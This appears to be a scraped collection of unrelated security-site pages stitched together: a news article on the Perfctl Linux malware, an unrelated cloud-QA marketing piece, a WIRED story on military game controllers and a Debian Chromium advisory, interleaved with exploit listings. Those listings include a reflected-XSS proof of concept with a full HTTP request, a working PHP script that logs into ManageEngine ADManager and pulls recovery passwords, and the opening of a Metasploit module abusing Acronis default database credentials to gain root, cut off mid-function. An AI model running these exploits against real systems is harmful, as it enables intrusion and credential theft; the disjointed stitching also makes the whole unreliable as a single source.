Perfctl malware is hard to detect, persists after reboots, and can perform a breadth of malicious activities.

Thousands of machines running Linux have been infected by a malware strain that’s notable for its stealth, the number of misconfigurations it can exploit, and the breadth of malicious activities it can perform, researchers reported Thursday.

The malware has been circulating since at least 2021. It gets installed by exploiting more than 20,000 common misconfigurations, a capability that may make millions of machines connected to the internet potential targets, researchers from Aqua Security said. It can also exploit CVE-2023-33426, a vulnerability with a severity rating of 10 out of 10 that was patched last year in Apache RocketMQ, a messaging and streaming platform that’s found on many Linux machines.

****Perfctl Storm****

The researchers are calling the malware Perfctl, the name of a malicious component that surreptitiously mines cryptocurrency. The unknown developers of the malware gave the process a name that combines the perf Linux monitoring tool and ctl, an abbreviation commonly used with command line tools. A signature characteristic of Perfctl is its use of process and file names that are identical or similar to those commonly found in Linux environments. The naming convention is one of the many ways the malware attempts to escape notice of infected users.

Perfctl further cloaks itself using a host of other tricks. One is that it installs many of its components as rootkits, a special class of malware that hides its presence from the operating system and administrative tools. Other stealth mechanisms include:

*   Stopping activities that are easy to detect when a new user logs in
*   Using a Unix socket over TOR for external communications
*   Deleting its installation binary after execution and running as a background service thereafter
*   Manipulating the Linux process pcap\_loop through a technique known as hooking to prevent admin tools from recording the malicious traffic
*   Suppressing mesg errors to avoid any visible warnings during execution.

The malware is designed to ensure persistence, meaning the ability to remain on the infected machine after reboots or attempts to delete core components. Two such techniques are (1) modifying the ~/.profile script, which sets up the environment during user login so the malware loads ahead of legitimate workloads expected to run on the server and (2) copying itself from memory to multiple disk locations. The hooking of pcap\_loop can also provide persistence by allowing malicious activities to continue even after primary payloads are detected and removed.

Besides using the machine resources to mine cryptocurrency, Perfctl also turns the machine into a profit-making proxy that paying customers use to relay their internet traffic. Aqua Security researchers have also observed the malware serving as a backdoor to install other families of malware.

Assaf Morag, Aqua Security’s threat intelligence director, wrote in an email:

> Perfctl malware stands out as a significant threat due to its design, which enables it to evade detection while maintaining persistence on infected systems. This combination poses a challenge for defenders and indeed the malware has been linked to a growing number of reports and discussions across various forums, highlighting the distress and frustration of users who find themselves infected.
> 
> Perfctl uses a rootkit and changes some of the system utilities to hide the activity of the cryptominer and proxy-jacking software. It blends seamlessly into its environment with seemingly legitimate names. Additionally, Perfctl’s architecture enables it to perform a range of malicious activities, from data exfiltration to the deployment of additional payloads. Its versatility means that it can be leveraged for various malicious purposes, making it particularly dangerous for organizations and individuals alike.

****“The Malware Always Manages to Restart”****

While Perfctl and some of the malware it installs are detected by some antivirus software, Aqua Security researchers were unable to find any research reports on the malware. They were, however, able to find a wealth of threads on developer-related sites that discussed infections consistent with it.

This Reddit comment posted to the CentOS subreddit is typical. An admin noticed that two servers were infected with a cryptocurrency hijacker with the names perfcc and perfctl. The admin wanted help investigating the cause.

“I only became aware of the malware because my monitoring setup alerted me to 100% CPU utilization,” the admin wrote in the April 2023 post. “However, the process would stop immediately when I logged in via SSH or console. As soon as I logged out, the malware would resume running within a few seconds or minutes.” The admin continued:

> I have attempted to remove the malware by following the steps outlined in other forums, but to no avail. The malware always manages to restart once I log out. I have also searched the entire system for the string "perfcc" and found the files listed below. However, removing them did not resolve the issue. as it keep respawn on each time rebooted.

Other discussions include: Reddit, Stack Overflow (Spanish), forobeta (Spanish), brainycp (Russian), natnetwork (Indonesian), Proxmox (Deutsch), Camel2243 (Chinese), svrforum (Korean), exabytes, virtualmin, serverfault and many others.

After exploiting a vulnerability or misconfiguration, the exploit code downloads the main payload from a server, which, in most cases, has been hacked by the attacker and converted into a channel for distributing the malware anonymously. An attack that targeted the researchers’ honeypot named the payload httpd. Once executed, the file copies itself from memory to a new location in the /temp directory, runs it, and then terminates the original process and deletes the downloaded binary.

Once moved to the /tmp directory, the file executes under a different name, which mimics the name of a known Linux process. The file hosted on the honeypot was named sh. From there, the file establishes a local command-and-control process and attempts to gain root system rights by exploiting CVE-2021-4043, a privilege-escalation vulnerability that was patched in 2021 in Gpac, a widely used open source multimedia framework.

The malware goes on to copy itself from memory to a handful of other disk locations, once again using names that appear as routine system files. The malware then drops a rootkit, a host of popular Linux utilities that have been modified to serve as rootkits, and the miner. In some cases, the malware also installs software for “proxy-jacking,” the term for surreptitiously routing traffic through the infected machine so the true origin of the data isn’t revealed.

The researchers continued:

> As part of its command-and-control operation, the malware opens a Unix socket, creates two directories under the /tmp directory, and stores data there that influences its operation. This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information. Additionally, the malware uses environment variables to store data that further affects its execution and behavior.
> 
> All the binaries are packed, stripped, and encrypted, indicating significant efforts to bypass defense mechanisms and hinder reverse engineering attempts. The malware also uses advanced evasion techniques, such as suspending its activity when it detects a new user in the btmp or utmp files and terminating any competing malware to maintain control over the infected system.

By extrapolating data such as the number of Linux servers connected to the internet across various services and applications, as tracked by services such as Shodan and Censys, the researchers estimate that the number of machines infected by Perfctl is measured in the thousands. They say that the pool of vulnerable machines—meaning those that have yet to install the patch for CVE-2023-33426 or contain a vulnerable misconfiguration—is in the millions. The researchers have yet to measure the amount of cryptocurrency the malicious miners have generated.

People who want to determine if their device has been targeted or infected by Perfctl should look for indicators of compromise included in Thursday’s post. They should also be on the lookout for unusual spikes in CPU usage or sudden system slowdowns, particularly if they occur during idle times. Thursday’s report also provides steps for preventing infections in the first place.

_This story originally appeared on_ _Ars Technica._

Stealthy Malware Has Infected Thousands of Linux Systems for Years

Computer Laboratory Management System 2024 version 1.0 suffers from a cross site scripting vulnerability.

    ## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure## Author: nu11secur1ty## Date: 00/04/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the username request parameter is copied into the HTMLdocument as plain text between tags. The payload ro2iz<img src=aonerror=alert(1)>xggkt was submitted in the username parameter. This inputwas echoed unmodified in the application's response.STATUS: HIGH- Vulnerability[+]Exploits:- XSS-Reflected:```xssPOST /php-lms/classes/Login.php?f=login HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqmlOrigin: https://pwnedhost.comX-Requested-With: XMLHttpRequestReferer: https://pwnedhost.com/php-lms/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128","Chromium";v="128"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7```+ [Response]```HTTP/1.1 200 OKDate: Fri, 04 Oct 2024 08:27:39 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 177Connection: closeContent-Type: text/html; charset=UTF-8{"status":"incorrect","last_qry":"SELECT * from users where username ='VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}```## Reproduce:[href](https://www.patreon.com/nu11secur1ty)## Demo PoC:[href](https://www.patreon.com/nu11secur1ty)## Time spent:00:27:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Computer Laboratory Management System 2024 1.0 Cross Site Scripting

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

    =============================================================================================================================================| # Title     : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.manageengine.com/products/ad-manager/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a  Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) {    // تهيئة Session    $ch = curl_init();        // تحويل نوع المصادقة إذا كان ADManager    if (strtolower($auth) == 'admanager') {        $auth = 'ADManager Plus Authentication';    }        // بيانات تسجيل الدخول    $data = http_build_query([        "is_admp_pass_encrypted" => "false",        "j_username" => $user,        "j_password" => $password,        "domainName" => $auth,        "AUTHRULE_NAME" => "ADAuthenticator"    ]);        // إعدادات الطلب    $url = $target . 'j_security_check?LogoutFromSSO=true';    curl_setopt($ch, CURLOPT_URL, $url);    curl_setopt($ch, CURLOPT_POST, true);    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HTTPHEADER, [        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",        "Content-Type: application/x-www-form-urlencoded"    ]);    // إرسال الطلب    $response = curl_exec($ch);        // التحقق من المصادقة    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);    if (strpos($response, 'Cookie') !== false) {        echo "[+] Authentication successful!\n";    } elseif ($http_code == 200) {        echo "[-] Invalid login name/password!\n";        exit(0);    } else {        echo "[-] Something went wrong!\n";        exit(1);    }    // استرجاع كلمة المرور    for ($i = 1; $i <= 5; $i++) {        echo "[*] Trying to fetch recovery password for domainId: $i!\n";        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';        curl_setopt($ch, CURLOPT_URL, $passUrl);        curl_setopt($ch, CURLOPT_POST, false);        $passResponse = curl_exec($ch);                if ($passResponse) {            echo $passResponse . "\n";        }    }    curl_close($ch);}function get_args() {    global $argv;    $args = [        'target' => '',        'auth' => '',        'user' => '',        'password' => ''    ];    for ($i = 1; $i < count($argv); $i++) {        switch ($argv[$i]) {            case '-t':            case '--target':                $args['target'] = $argv[++$i];                break;            case '-a':            case '--auth':                $args['auth'] = $argv[++$i];                break;            case '-u':            case '--user':                $args['user'] = $argv[++$i];                break;            case '-p':            case '--password':                $args['password'] = $argv[++$i];                break;        }    }    return $args;}function main() {    $args = get_args();    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";        exit(1);    }    getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ManageEngine ADManager 7183 Password Hash Disclosure

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification…

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification processes to the cloud, QA teams gain access to unprecedented scalability, flexibility, and efficiency. This shift is enabling teams to optimize their workflows, better handle growing demands, and respond more swiftly to project needs.

Companies can now accelerate their evaluation cycles, enhance collaboration, and reduce costs, all while leveraging the latest technological advancements. Cloud-based platforms offer a unified environment where QA professionals, developers, and managers can work together seamlessly, regardless of their physical location. This transformation is rapidly becoming a cornerstone of modern software development.

According to AI-powered QA management tool and service provider Aqua Cloud, addressing key pain points in the software validation process requires thorough diligence. Therefore, teams must focus on higher-value activities by simplifying repetitive processes using Aqua Cloud’s AI-powered capabilities and automation tools.

Centralizing quality management in a single ecosystem helps to remove silos and guarantees seamless processes, hence greatly lowering the inefficiencies often afflicting dispersed QA systems.

****The Scalability and Flexibility of Cloud-Based Quality Assurance****

One of the primary advantages of cloud-based solutions is the ability to scale QA environments quickly and efficiently. Traditional on-premise infrastructure requires significant investment in hardware and maintenance, which limits the capacity to scale as demand increases. 

In contrast, cloud-based platforms allow QA teams to scale up or down depending on their current needs, whether they handle small-scale projects or manage enterprise-level applications. This scalability improves resource allocation and reduces the time needed to set up validation environments.

Additionally, cloud-based platforms provide unmatched flexibility. Teams can access QA environments from anywhere, facilitating global collaboration. As remote work becomes more common, the cloud’s accessibility ensures that quality assurance professionals and developers can work together without geographic constraints. This collaborative environment fosters better communication and faster resolution of issues, helping to meet tight development deadlines.

****Cost Efficiency Through Pay-as-You-Go Models****

Cost savings are a critical factor driving the adoption of cloud-based QA solutions. Traditional quality assurance infrastructures require substantial upfront capital investment in hardware, licenses, and ongoing maintenance. Cloud-based platforms, on the other hand, operate on a pay-as-you-go model, meaning that organizations only pay for the resources they use. This allows businesses to optimize their budgets, especially when workloads fluctuate.

The cloud also eliminates the need for dedicated physical infrastructure, reducing not only hardware costs but also associated overheads like energy consumption and IT staff for maintenance. The savings can be redirected toward improving other areas of software development and quality assurance, such as hiring additional QA specialists or investing in advanced tools.

****Enhanced Cooperation and Automation****

In today’s fast-paced software development lifecycle (SDLC), collaboration is essential to delivering high-quality software products. Cloud-based platforms enhance collaboration by providing a centralized repository where all team members can access QA data in real-time. This transparency ensures that everyone — from quality managers to QA professionals and developers — clearly understands the progress and can act swiftly to resolve issues.

Automation is another significant benefit offered by cloud-based solutions. Automated tools integrated within these platforms reduce the need for manual intervention, allowing QA teams to run extensive validation cases without delays. This is particularly useful for repetitive tasks like regression checks, where automation can dramatically cut down the time required for execution. As a result, QA teams can shift their focus to more critical aspects of the process, such as exploratory assessments or improving coverage.

****Improved Security and Compliance****

Security is a primary concern for businesses, particularly those in regulated industries such as healthcare and finance. Cloud-based solutions have evolved to offer strong security features that ensure data integrity and confidentiality. Leading cloud service providers often offer advanced encryption, multi-factor authentication, and compliance with international security standards.

Moreover, cloud-based QA platforms help organizations meet regulatory requirements by providing audit-ready documentation and traceability. Every action within the quality assurance process is logged, ensuring that companies can prove compliance during audits. This feature is invaluable for industries requiring strict data handling and security protocols.

****Integration with Existing Tools****

Another major advantage of cloud-based solutions is their ability to integrate seamlessly with existing tools and frameworks used in the software development lifecycle. Many QA teams rely on a mix of open-source and proprietary tools, which can be difficult to synchronize when operating on traditional infrastructures. Cloud platforms simplify this process by offering pre-built integrations with popular tools like Jira, Jenkins, and Azure DevOps.

This interoperability reduces the complexity of managing multiple systems and eliminates data silos. When all tools are connected within the cloud ecosystem, it becomes easier for teams to share information, monitor performance, and ensure that the entire software development process runs smoothly.

Cloud-based solutions are transforming the infrastructure of software quality assurance, offering unmatched scalability, flexibility, and cost-efficiency. As businesses continue to embrace digital transformation, cloud-based QA solutions will play an increasingly vital role in ensuring the success of software development projects, eliminating inefficiencies, and taking away the pains that have traditionally been associated with the quality assurance process.

1.  Best Practices for Cloud Computing Security
2.  How To Safeguard Your Data With Cloud MRP System
3.  The Role of DevOps in Streamlining Cloud Migration Processes
4.  Insights on Google Cloud Backup and Disaster Recovery Service
5.  Risk Management Strategies: Incorporating Cloud WAFs into Plan

How Cloud-Based Solutions Are Transforming Software Quality Assurance

After decades of relying on buttons, switches, and toggles, the Pentagon has embraced simple, ergonomic video-game-style controllers already familiar to millions of potential recruits.

In a future conflict, American troops will direct the newest war machines not with sprawling control panels or sci-fi-inspired touchscreens, but controls familiar to anyone who grew up with an Xbox or PlayStation in their home.

Over the past several years, the US Defense Department has been gradually integrating what appear to be variants of the Freedom of Movement Control Unit (FMCU) handsets as the primary control units for a variety of advanced weapons systems, according to publicly available imagery published to the department’s Defense Visual Information Distribution System media hub.

Those systems include the new Navy Marine Corps Expeditionary Ship Interdiction System (NMESIS) launcher, a Joint Light Tactical Vehicle–based anti-ship missile system designed to fire the new Naval Strike Missile that’s essential to the Marine Corps’ plans for a notional future war with China in the Indo-Pacific; the Army’s new Maneuver-Short Range Air Defense (M-SHORAD) system that, bristling with FIM-92 Stinger and AGM-114 Hellfire missiles and a 30-mm chain gun mounted on a Stryker infantry fighting vehicle, is seen as a critical anti-air capability in a potential clash with Russia in Eastern Europe; the Air Force’s MRAP-based Recovery of Air Bases Denied by Ordnance (RADBO) truck that uses a laser to clear away improvised explosive devices and other unexploded munitions; and the Humvee-mounted High Energy Laser-Expeditionary (HELEX) laser weapon system currently undergoing testing by the Marine Corps.

The FMCU has also been employed on a variety of experimental unmanned vehicles, and according to a 2023 Navy contract, the system will be integral to the operation of the AN/SAY-3A Electro-Optic Sensor System (or “I-Stalker”) that’s designed to help the service’s future Constellation-class guided-missile frigates track and engage incoming threats.

Produced since 2008 by Measurement Systems Inc. (MSI), a subsidiary of British defense contractor Ultra that specializes in human-machine interfaces, the FMCU offers a similar form factor to the standard Xbox or PlayStation controller but with a ruggedized design intended to safeguard its sensitive electronics against whatever hostile environs American service members may find themselves in. A longtime developer of joysticks used on various US naval systems and aircraft, MSI has served as a subcontractor to major defense “primes” like General Atomics, Boeing, Lockheed Martin, and BAE Systems to provide the handheld control units for “various aircraft and vehicle programs,” according to information compiled by federal contracting software GovTribe.

“With the foresight to recognize the form factor that would be most accessible to today’s warfighters, \[Ultra\] has continued to make the FMCU one of the most highly configurable and powerful controllers available today,” according to Ultra. (The company did not respond to multiple requests for comment from WIRED.)

The endlessly customizable FMCU isn’t totally new technology: According to Ultra, the system has been in use since at least 2010 to operate the now-sundowned Navy’s MQ-8 Fire Scout unmanned autonomous helicopter and the Ground Based Operational Surveillance System (GBOSS) that the Army and Marine Corps have both employed throughout the global war on terror. But the recent proliferation of the handset across sophisticated new weapon platforms reflects a growing trend in the US military towards controls that aren’t just uniquely tactile or ergonomic in their operation, but inherently familiar to the next generation of potential warfighters before they ever even sign up to serve.

“For RADBO, the operators are generally a much younger audience,” an Air Force spokesman tells WIRED. “Therefore, utilizing a PlayStation or Xbox type of controller such as the FMCU seems to be a natural transition for the gaming generation.”

An Xbox game controller used to maneuver the photonic mast aboard the USS _Colorado_ submarine in 2018.Photograph: Courtesy of U.S. Navy/Mass Communication Specialist First Class Steven Hoskins

Indeed, that the US military is adopting specially built video-game-style controllers may appear unsurprising: The various service branches have long experimented with commercial off-the-shelf console handsets for operating novel systems. The Army and Marine Corps have for more than a decade used Xbox controllers to operate small unmanned vehicles, from ground units employed for explosive ordnance disposal to airborne drones, as well as larger assets like the M1075 Palletized Loading System logistics vehicle. Meanwhile, the “photonics mast” that has replaced the traditional periscope on the Navy’s new Virginia-class submarines uses the same inexpensive Xbox handset, as does the service’s Multifunctional Automated Repair System robot that’s employed on surface warships to address everything from in-theater battle damage repair to shipyard maintenance.

This trend is also prevalent among defense industry players angling for fresh Pentagon contracts: Look no further than the LOCUST Laser Weapon System developed by BlueHalo for use as the Army’s Palletized-High Energy Laser (P-HEL) system, which explicitly uses an Xbox controller to help soldiers target incoming drones and burn them out of the sky—not unlike the service’s previous ventures into laser weapons.

"By 2006, games like _Halo_ were dominant in the military," Tom Phelps, then a product director at iRobot, told Business Insider in 2013 of the company’s adoption of a standard Xbox controller for its PackBot IED disposal robot. "So we worked with the military to socialize and standardize the concept … It was considered a very strong success, younger soldiers with a lot of gaming experience were able to adapt quickly."

Commercial video game handsets have also proven popular beyond the ranks of the US military, from the British Army’s remote-controlled Polaris MRZR all-terrain vehicle to Israel Aerospace Industries’ Carmel battle tank, the latter of which had its controls developed with feedback from teenage gamers who reportedly eschewed the traditional fighter jet-style joystick in favor of a standard video game handset. More recently, Ukrainian troops have used PlayStation controllers and Steam Decks to direct armed unmanned drones and machine gun turrets against invading Russian forces. And these controllers have unusual non-military applications as well: Most infamously, the OceanGate submarine that suffered a catastrophic implosion during a dive to the wreck of the Titanic in June 2023 was operated with a version of a Logitech F710 controller, as CBS News reported at the time.

“They are far more willing to experiment, they are much less afraid of technology … It comes to them naturally,” Israeli Defense Forces colonel Udi Tzur told The Washington Post in 2020 of optimizing the Carmel tank’s controls for younger operators. “It’s not exactly like playing _Fortnite_, but something like that, and amazingly they bring their skills to operational effectiveness in no time. I’ll tell you the truth, I didn’t think it could be reached so quickly.”

There are clear advantages to using cheap video-game-style controllers to operate advanced military weapons systems. The first is a matter of, well, control: Not only are video game handsets more ergonomic, but the configuration of buttons and joysticks offers tactile feedback not generally available from, say, one of the US military’s now-ubiquitous touchscreens. The Navy in particular learned this the hard way following the 2017 collision between the Arleigh Burke-class destroyer USS _John S. McCain_ and an oil tanker off the coast of Singapore, an incident that prompted the service to swap out its bridge touchscreens for mechanical throttles across its guided-missile destroyer fleet after a National Transportation Safety Board report on the accident noted that sailors preferred the latter because “they provide\[d\] both immediate and tactile feedback to the operator.” Sure, a US service member may not operate an Xbox controller with a “rumble” feature, but the configuration of video-game-style controllers like the FMCU does offer significant tactile (and tactical) advantages over dynamic touchscreens, a conclusion several studies appear to reinforce.

But the real advantage of video-game-style controllers for the Pentagon is, as military officials and defense contractors have noted, their familiarity to the average US service member. As of 2024, more than 190.6 million Americans of all ages, or roughly 61 percent of the country, played video games, according to an annual report from the Entertainment Software Association trade group, while data from the Pew Research Center published in May indicates that 85 percent of American teenagers say they play video games, with 41 percent reporting that they play daily.

In terms of specific video games systems, the ESA report indicates that consoles and their distinctive controllers reign supreme among Gen Z and Gen Alpha—both demographic groups that stand to eventually end up fighting in America’s next big war. The Pentagon is, in the words of military technologist Peter W. Singer, “free-riding” off a video game industry that has spent decades training Americans on a familiar set of controls and ergonomics that, at least since the PlayStation introduced elongated grips in the 1990s, have been standard among most game systems for years (with apologies to the Wii remote that the Army eyed for bomb-disposal robots nearly two decades ago).

“The gaming companies spent millions of dollars developing an optimal, intuitive, easy-to-learn user interface, and then they went and spent years training up the user base for the US military on how to use that interface,” Singer said in a March 2023 interview. “These designs aren’t happenstance, and the same pool they’re pulling from for their customer base, the military is pulling from … and the training is basically already done.”

At the moment, it’s unclear how exactly many US military systems use the FMCU. When reached for comment, the Pentagon confirmed the use of the system on the NMESIS, M-SHORAD, and RADBO weapons platforms and referred WIRED to the individual service branches for additional details. The Marine Corps confirmed the handset’s use with the GBOSS, while the Air Force again confirmed the same for the RADBO. The Navy stated that the service does not currently use the FMCU with any existing systems; the Army did not respond to requests for comment.

How far the FMCU and its commercial off-the-shelf variants will spread throughout the ranks of the US military remains to be seen. But controls that effectively translate human inputs into machine movement tend to persist for decades after their introduction: After all, the joystick (or “control column,” in military parlance) has been a fixture of military aviation since its inception. Here’s just hoping that the Pentagon hasn’t moved on to the Power Glove by the time the next big war rolls around.

How This Video Game Controller Became the US Military’s Weapon of Choice

Debian Linux Security Advisory 5781-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5781-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 03, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7025 CVE-2024-9369 CVE-2024-9370Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.89-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmb+VpEACgkQZF0CR8NudjcrIBAAvzzNE73GYxK9O94ezzRCwoQ9+63+b//jaehANfSl4yhHdZfGpg2WuR2SBjtFUMc92gFUzrvtgKe/+gg5kY4r02YZkyZNEHsh5b5VjLBKjfMk4f+RnnEujqEFB1EDeBMbyRfMoi3dHlij4Gb4x+gpuxBJkoBa5DCnu3RD/KGWVMNw7AdDH2XUprGZ56qxzIdXIggj23baFwd3ms6aPpKVufB+RYvyj8qr+uIo1pyRdHZGjeZmbxwGLGA7R8VOfBJ4hj7bn63aNANYbgm5nzSYz7onmLhHIxlmGonDU2lsr34Kl9dViHz5peoMtlSfv9/zLaHXmJUEmXXL8Vf3jm975hcYSaWWggvnMVysWljSAbPuLloLISATzdLGDeHPtJDqX+Y9XjN2UZ1sJHRGRog5iZBPwj6H4QN8quGoGY9JxBlL3FOmgmMafZkUncEAKitpahtEMEsmayMl3iePHIulOUdOCVpnrGgaa1Lc0yAkR1VomlMrjrE2FB28y+dh4MiaERxMnO7EfSSRQ0nTD55iBzpdn3dRIDErqfMFyWSAfCDvPGhcRYU0vQaKysujrg+pUldkpIMPLnZvyytQFH6A9lYth9NBdAgMc1IN86BEyUXGcUTIO4FdQE+9QsWC3p7Iji/XK0WvEmXNjYe1M7zDFELRFxdhW6qVX9Xx2N+pTpM==V9OV-----END PGP SIGNATURE-----

Debian Security Advisory 5781-1

Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. Businesses and Service Providers are using it for data storage, backup storage, creating and managing virtual machines and software-defined networks, running cloud-native applications in production environments. This Metasploit module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal. This opens the door for the attacker to upload SSH keys that enables root access to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69, 5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'sshkey'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include BCrypt  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::Postgres  include Msf::Exploit::Remote::SSH  prepend Msf::Exploit::Remote::AutoCheck  # ssh_socket  attr_accessor :ssh_socket  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Acronis Cyber Infrastructure default password remote code execution',        'Description' => %q{          Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,          compute, and network resources. Businesses and Service Providers are using it for data storage,          backup storage, creating and managing virtual machines and software-defined networks, running          cloud-native applications in production environments.          This module exploits a default password vulnerability in ACI which allow an attacker to access          the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.          This opens the door for the attacker to upload SSH keys that enables root access          to the appliance/server. This attack can be remotely executed over the WAN as long as the          PostgreSQL and SSH services are exposed to the outside world.          ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,          5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Acronis International GmbH', # discovery        ],        'References' => [          ['CVE', '2023-45249'],          ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],          ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']        ],        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Privileged' => true,        'Arch' => [ARCH_CMD],        'Targets' => [          [            'Unix/Linux Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd            }          ],          [            'Interactive SSH',            {              'Type' => :ssh_interact,              'DefaultOptions' => {                'PAYLOAD' => 'generic/ssh/interact'              },              'Payload' => {                'Compat' => {                  'PayloadType' => 'ssh_interact'                }              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-07-24',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8888,          'USERNAME' => 'vstoradmin',          'PASSWORD' => 'vstoradmin',          'DATABASE' => 'keystone',          'SSH_TIMEOUT' => 30,          'WfsDelay' => 5        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')    register_options([      OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),      OptPort.new('SSHPORT', [true, 'SSH port', 22]),      OptString.new('PRIV_KEY_FILE', [false, 'SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)', ''])    ])    register_advanced_options([      OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])    ])  end  # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)  def add_admin_user(username, userid, password)    vprint_status("Creating admin user #{username} with userid #{userid}")    # add new admin user 